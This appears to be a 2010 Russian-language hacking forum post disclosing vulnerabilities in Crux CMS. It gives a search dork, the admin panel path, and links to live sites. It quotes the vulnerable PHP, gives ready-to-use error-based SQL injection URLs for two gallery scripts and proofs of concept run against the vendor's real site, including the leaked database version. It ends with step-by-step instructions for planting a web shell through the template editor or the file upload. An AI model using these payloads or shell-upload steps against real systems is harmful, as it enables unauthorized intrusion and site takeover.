Старый 10.07.2010, 02:07   #1
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию Уязвимости Crux CMS

Crux CMS Ver3.00-03-02-08 -

OFFICIAL SITE:
Код:
http://www.cruxsoftware.co.uk/download.php
DORK: Powered by Crux CMS

Admin panel: - /manager/login.php

phpinfo: -
Код:
http://www.christian-housesitters.com/install/phpinfo.php
Full Path Disclosure: -
Код:
http://localhost/cruxcms/includes/check.php
SQL injection [demonstration on OFFICIAL SITE]:

1) ../image-gallery/image-detail.php
PHP код:
...
// get the image id 
    
$imageId $_GET['image']; 
    
// Get data for that id 
    
$sql  "SELECT imageid, imagealbum, imagetitle, imagedesc, imageshort, imagefile, albumname 
             FROM  " 
imagedb "  im,  " albumdb "  al 
             WHERE imageid = 
$imageId AND im.imagealbum = al.albumid"
     
    
$result mysql_query($sql) or die('Error, get image info failed. ' mysql_error()); 
... 
EXPLOIT:
Код:
http://localhost/cruxcms/image-gallery/image-detail.php?image=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
POC:
Код:
http://www.cruxsoftware.co.uk/image-gallery/image-detail.php?image=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+

Error, get image info failed. Duplicate entry '5.0.77-log1' for key 1
2) ../image-gallery/list-image.php
PHP код:
...
// Get albumid from previous page 
$albumId $_GET['album']; 
// Get data for that album 
$query  "SELECT imageid, imagetitle, imagedesc, imageshort, imagefile 
           FROM  " 
imagedb 
           WHERE imagealbum = 
$albumId 
           ORDER BY imagetitle"

$result mysql_query($query) or die('Error, list image failed. ' mysql_error());
... 
EXPLOIT:
Код:
http://localhost/cruxcms/image-gallery/list-image.php?album=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
POC:
Код:
http://www.cruxsoftware.co.uk/image-gallery/list-image.php?album=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
Заливка шелла из админпанели:

1) Template Manager->Выбираем текущий->Edit Template->Просто вписываем <?php-код?>

2) Сразу идем в File Manager->Upload File и льем шелл, кричит: Error - Suspected injection, т.к. расширение не подходит, но файло реально льется в папку:

Код:
../Uploads/Misc/
но под другим именем, чтобы узнать имя залитого шелла:

File Manager и видим примерно следующее:

Код:
php	Hypertext Preprocessor File	58.3681640625Kb	Edit
ссылки на файло не видно, но спокойно можно посмотреть в исходниках странички:

CTRL+F "58.36816" выдаст рядом:

Код:
<td><a href="../Uploads/Misc/wso2-2.680.php"></a></td>
что и есть путь к шеллу относительно корня сайта.

Последний раз редактировалось (dm); 19.08.2010 в 01:24.. Причина: изменение заголовка
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot